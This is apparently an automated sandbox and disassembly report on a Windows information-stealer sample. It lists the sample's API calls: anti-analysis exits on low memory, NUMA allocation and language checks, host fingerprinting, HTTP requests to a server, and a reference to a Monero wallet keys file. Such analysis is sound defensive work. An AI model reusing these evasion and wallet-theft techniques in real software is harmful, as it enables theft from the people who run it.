                              • GetProcAddress.KERNEL32(759D0000,015B65A0), ref: 0086A4B8
                              • GetProcAddress.KERNEL32(759D0000,015B6580), ref: 0086A4D1
                              • GetProcAddress.KERNEL32(76D80000,015B6280), ref: 0086A4F2
                              • GetProcAddress.KERNEL32(76D80000,015CCD20), ref: 0086A50A
                              • GetProcAddress.KERNEL32(6F5C0000,015B62A0), ref: 0086A530
                              • GetProcAddress.KERNEL32(6F5C0000,015B63C0), ref: 0086A548
                              • GetProcAddress.KERNEL32(6F5C0000,015B62E0), ref: 0086A560
                              • GetProcAddress.KERNEL32(6F5C0000,015CCC60), ref: 0086A579
                              • GetProcAddress.KERNEL32(6F5C0000,015B6340), ref: 0086A591
                              • GetProcAddress.KERNEL32(6F5C0000,015B6520), ref: 0086A5A9
                              • GetProcAddress.KERNEL32(6F5C0000,015B6460), ref: 0086A5C2
                              • GetProcAddress.KERNEL32(6F5C0000,015B6360), ref: 0086A5DA
                              • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 0086A5F1
                              • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 0086A607
                              • GetProcAddress.KERNEL32(75480000,015CCC30), ref: 0086A629
                              • GetProcAddress.KERNEL32(75480000,015C8840), ref: 0086A641
                              • GetProcAddress.KERNEL32(75480000,015CCBD0), ref: 0086A659
                              • GetProcAddress.KERNEL32(75480000,015CCCA8), ref: 0086A672
                              • GetProcAddress.KERNEL32(753B0000,015B6500), ref: 0086A693
                              • GetProcAddress.KERNEL32(6EAD0000,015CCBE8), ref: 0086A6B4
                              • GetProcAddress.KERNEL32(6EAD0000,015B6380), ref: 0086A6CD
                              • GetProcAddress.KERNEL32(6EAD0000,015CCDB0), ref: 0086A6E5
                              • GetProcAddress.KERNEL32(6EAD0000,015CCB70), ref: 0086A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 57939c42aa48986ea2dc1244f365ad6fee277cd864e90a18a66b5d2895976dc5
                              • Instruction ID: c43ca45e41ab2fe5d7cc18c283c89dea807f4a3528c919572155109acbda3e22
                              • Opcode Fuzzy Hash: 57939c42aa48986ea2dc1244f365ad6fee277cd864e90a18a66b5d2895976dc5
                              • Instruction Fuzzy Hash: 2762E8B6710200AFC744DFE9ED8996637F9F7AC701724851BA609C3274DE399843DB92

                              Control-flow Graph

                              Control-flow graph of the function at 00865510 (basic blocks 865510 through 865ac6; calls StrCmpCA and Sleep). The rendered graph and its Executed / Not Executed colouring are not recoverable from the page.
                              APIs
                                • Part of subcall function 0086A820: lstrlen.KERNEL32(00854F05,?,?,00854F05,00870DDE), ref: 0086A82B
                                • Part of subcall function 0086A820: lstrcpy.KERNEL32(00870DDE,00000000), ref: 0086A885
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00865644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008656A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00865857
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008651F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00865228
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 008652C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00865318
                                • Part of subcall function 008652C0: lstrlen.KERNEL32(00000000), ref: 0086532F
                                • Part of subcall function 008652C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00865364
                                • Part of subcall function 008652C0: lstrlen.KERNEL32(00000000), ref: 00865383
                                • Part of subcall function 008652C0: lstrlen.KERNEL32(00000000), ref: 008653AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0086578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00865940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00865A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00865A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 242ef77ed280447d1755897380b4194a76b2a5cb8e69118e2d4460b76c14dc71
                              • Instruction ID: 40340a28082e6c681bacc9178142e687526ccc414484d337fb0dded4763cee34
                              • Opcode Fuzzy Hash: 242ef77ed280447d1755897380b4194a76b2a5cb8e69118e2d4460b76c14dc71
                              • Instruction Fuzzy Hash: 70E11171A101089ACB18FBA8DC97AED7378FF64301F518529B506E7195EF346A0ACF93

                              Control-flow Graph

                              Control-flow graph of the function at 008617A0 (basic blocks 8617a0 through 8619cd; calls StrCmpCA and ExitProcess). The rendered graph and its Executed / Not Executed colouring are not recoverable from the page.
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 008617C5
                              • ExitProcess.KERNEL32 ref: 008617D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 353c7eb3ea2a78d745381d0717c6c801eee9f3b60fcc38d93635b9157104719f
                              • Instruction ID: 96aa4ec0eec23c9395f347689d094bd3452b7d6fd359e84d2c39cc98b11df303
                              • Opcode Fuzzy Hash: 353c7eb3ea2a78d745381d0717c6c801eee9f3b60fcc38d93635b9157104719f
                              • Instruction Fuzzy Hash: 39517AB4A00209EFCF04DFA1C958ABE7BB5FF44304F19845AE406E7241DB74E942CBA2

                              Control-flow Graph

                              Control-flow graph of the function at 00867500 (basic blocks 867500 through 86768e; calls GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA). The rendered graph and its Executed / Not Executed colouring are not recoverable from the page.
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00867542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0086757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00867603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0086760A
                              • wsprintfA.USER32 ref: 00867640
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 1555a0c69232f4a3d67746e72eae1bb3b734efb41de710a6f80b74f23eceb8ca
                              • Instruction ID: 0e93680fbbfb0a0b03ac8b9cb403010076a558e136f51ca0a89024c65404d8ef
                              • Opcode Fuzzy Hash: 1555a0c69232f4a3d67746e72eae1bb3b734efb41de710a6f80b74f23eceb8ca
                              • Instruction Fuzzy Hash: F14162B1E04258ABDB10DF98DC45BDEBBB8FF18704F104199F509A7280DB746A44CBA6

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C0570), ref: 008698A1
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C05A0), ref: 008698BA
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C0840), ref: 008698D2
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C0738), ref: 008698EA
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C0558), ref: 00869903
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C88E0), ref: 0086991B
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015B6980), ref: 00869933
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015B6960), ref: 0086994C
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C06A8), ref: 00869964
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C06D8), ref: 0086997C
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C06F0), ref: 00869995
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C05E8), ref: 008699AD
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015B69A0), ref: 008699C5
                                • Part of subcall function 00869860: GetProcAddress.KERNEL32(75550000,015C0708), ref: 008699DE
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 008511D0: ExitProcess.KERNEL32 ref: 00851211
                                • Part of subcall function 00851160: GetSystemInfo.KERNEL32(?), ref: 0085116A
                                • Part of subcall function 00851160: ExitProcess.KERNEL32 ref: 0085117E
                                • Part of subcall function 00851110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0085112B
                                • Part of subcall function 00851110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00851132
                                • Part of subcall function 00851110: ExitProcess.KERNEL32 ref: 00851143
                                • Part of subcall function 00851220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0085123E
                                • Part of subcall function 00851220: __aulldiv.LIBCMT ref: 00851258
                                • Part of subcall function 00851220: __aulldiv.LIBCMT ref: 00851266
                                • Part of subcall function 00851220: ExitProcess.KERNEL32 ref: 00851294
                                • Part of subcall function 00866770: GetUserDefaultLangID.KERNEL32 ref: 00866774
                                • Part of subcall function 00851190: ExitProcess.KERNEL32 ref: 008511C6
                                • Part of subcall function 00867850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008511B7), ref: 00867880
                                • Part of subcall function 00867850: RtlAllocateHeap.NTDLL(00000000), ref: 00867887
                                • Part of subcall function 00867850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0086789F
                                • Part of subcall function 008678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00867910
                                • Part of subcall function 008678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00867917
                                • Part of subcall function 008678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0086792F
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015C8850,?,0087110C,?,00000000,?,00871110,?,00000000,00870AEF), ref: 00866ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00866AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00866AF9
                              • Sleep.KERNEL32(00001770), ref: 00866B04
                              • CloseHandle.KERNEL32(?,00000000,?,015C8850,?,0087110C,?,00000000,?,00871110,?,00000000,00870AEF), ref: 00866B1A
                              • ExitProcess.KERNEL32 ref: 00866B22
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 1d69ebc535d8a6354ff815ade37c880762741f11c2893ca695ac02407f6854df
                              • Instruction ID: b7860ab3afda11bf0c05e57264f5b19b28bb5b8dae3baef519dc03f5b32fd961
                              • Opcode Fuzzy Hash: 1d69ebc535d8a6354ff815ade37c880762741f11c2893ca695ac02407f6854df
                              • Instruction Fuzzy Hash: FF310970A40208AADB08FBF8DC56BAE7779FF14301F524529F612E6191EF706905CAA3

                              Control-flow Graph
                              • Node 1204: 851220-851247, call 8689b0, GlobalMemoryStatusEx
                              • Node 1207: 851273-85127a
                              • Node 1208: 851249-851271, call 86da00 (2 calls)
                              • Node 1209: 851281-851285
                              • Node 1211: 851287
                              • Node 1212: 85129a-85129d
                              • Node 1215: 851292-851294, ExitProcess
                              • Node 1216: 851289-851290
                              • Edges: 1204->1207, 1204->1208, 1207->1209, 1208->1209, 1209->1211, 1209->1212, 1211->1215, 1211->1216, 1216->1212, 1216->1215
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0085123E
                              • __aulldiv.LIBCMT ref: 00851258
                              • __aulldiv.LIBCMT ref: 00851266
                              • ExitProcess.KERNEL32 ref: 00851294
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 951802b08107ee35af24fb0220f2ae2dd09754bb8334d24c7b7126c87ad82e90
                              • Instruction ID: 101af317fbf9730107b507d02f7d3a693fcd4e1ad778f289d7890614b1972d4e
                              • Opcode Fuzzy Hash: 951802b08107ee35af24fb0220f2ae2dd09754bb8334d24c7b7126c87ad82e90
                              • Instruction Fuzzy Hash: 4901FFB0E44308BADF10DBD4CC49B9EBB79FB14706F208145EA05F6180D77455458799

                              Control-flow Graph
                              • Node 1218: 866af3
                              • Node 1219: 866b0a
                              • Node 1221: 866b0c-866b22, call 866920, call 865b10, CloseHandle, ExitProcess
                              • Node 1222: 866aba-866ad7, call 86aad0, OpenEventA
                              • Node 1228: 866af5-866b04, CloseHandle, Sleep
                              • Node 1229: 866ad9-866af1, call 86aad0, CreateEventA
                              • Edges: 1218->1219, 1219->1221, 1219->1222, 1222->1228, 1222->1229, 1228->1219, 1229->1221
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015C8850,?,0087110C,?,00000000,?,00871110,?,00000000,00870AEF), ref: 00866ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00866AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00866AF9
                              • Sleep.KERNEL32(00001770), ref: 00866B04
                              • CloseHandle.KERNEL32(?,00000000,?,015C8850,?,0087110C,?,00000000,?,00871110,?,00000000,00870AEF), ref: 00866B1A
                              • ExitProcess.KERNEL32 ref: 00866B22
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: e22c7712de6692692d2af664ac74444056ae98c04abeef9176a3831c096e4125
                              • Instruction ID: 0779833598754d9f2e4e91829199b4f2a4ff6baf2912490a84b3f17352d4630f
                              • Opcode Fuzzy Hash: e22c7712de6692692d2af664ac74444056ae98c04abeef9176a3831c096e4125
                              • Instruction Fuzzy Hash: 8FF03A30A40269EBE710EBE09C06BBD7A34FB14702F118516B902F11C1EFB05551DAA7

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00854839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00854849
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 0d23095510e27832f01529db18d55874dbd869fd820417866a01166f64e9a4ab
                              • Instruction ID: 5172276f44c14ee603e60a8255343ec87def3d03359291f0301bf86b150b5f33
                              • Opcode Fuzzy Hash: 0d23095510e27832f01529db18d55874dbd869fd820417866a01166f64e9a4ab
                              • Instruction Fuzzy Hash: 98213EB1D00209ABDF14DFA4E945ADE7B74FB44320F10862AF919A72C0EB706A05CF92

                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 00856280: InternetOpenA.WININET(00870DFE,00000001,00000000,00000000,00000000), ref: 008562E1
                                • Part of subcall function 00856280: StrCmpCA.SHLWAPI(?,015CE4B0), ref: 00856303
                                • Part of subcall function 00856280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00856335
                                • Part of subcall function 00856280: HttpOpenRequestA.WININET(00000000,GET,?,015CDD78,00000000,00000000,00400100,00000000), ref: 00856385
                                • Part of subcall function 00856280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008563BF
                                • Part of subcall function 00856280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008563D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00865228
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 0182145ec9a84071f85e0c143200585af015e06aa0e64e1bb849e3a5103734f3
                              • Instruction ID: 34028fb94482ecca2e893627278873e1483fd8fcf4ec5c2c3988820ab1881904
                              • Opcode Fuzzy Hash: 0182145ec9a84071f85e0c143200585af015e06aa0e64e1bb849e3a5103734f3
                              • Instruction Fuzzy Hash: 5211DD30910548A6CB18FFA8DD96AED7378FF50301F418164F91AA7592EF34AB05CA93
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0085112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00851132
                              • ExitProcess.KERNEL32 ref: 00851143
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 8e7871202804914f9939a679e3bdcbd667a2a8490430f5f48edf91c66c06a994
                              • Instruction ID: ca0aa36893ac76229dcc4192e219856a46b19195b979369de7c4c2bc5966043a
                              • Opcode Fuzzy Hash: 8e7871202804914f9939a679e3bdcbd667a2a8490430f5f48edf91c66c06a994
                              • Instruction Fuzzy Hash: A0E0E670A95308FBEB10ABE49C0EB0976B8EB14B02F104056F709B61D0DAB5264596DA
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008510B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008510F7
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 330ff97ce26e8a959d1948c8ff88b63cd3e763ebd7a4eb6127b64ddb7d2471c6
                              • Instruction ID: 68256ee2b03baacc9db5d76773a14a23187be80007383e3b13bb2849096763af
                              • Opcode Fuzzy Hash: 330ff97ce26e8a959d1948c8ff88b63cd3e763ebd7a4eb6127b64ddb7d2471c6
                              • Instruction Fuzzy Hash: D3F0E271641208BBEB14DAA8AC4AFBAB7E8E705B15F300449F904E3280D9719E04CAA1
                              APIs
                                • Part of subcall function 008678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00867910
                                • Part of subcall function 008678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00867917
                                • Part of subcall function 008678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0086792F
                                • Part of subcall function 00867850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008511B7), ref: 00867880
                                • Part of subcall function 00867850: RtlAllocateHeap.NTDLL(00000000), ref: 00867887
                                • Part of subcall function 00867850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0086789F
                              • ExitProcess.KERNEL32 ref: 008511C6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 8bef2c8f2dc02e55fde9069c274e7237d7c7fe2d72f3072d61a3f350da59e490
                              • Instruction ID: 45332b6d21877bcbc67a4f80e236949aa1ec8c9e199a35e81657490d2a21702b
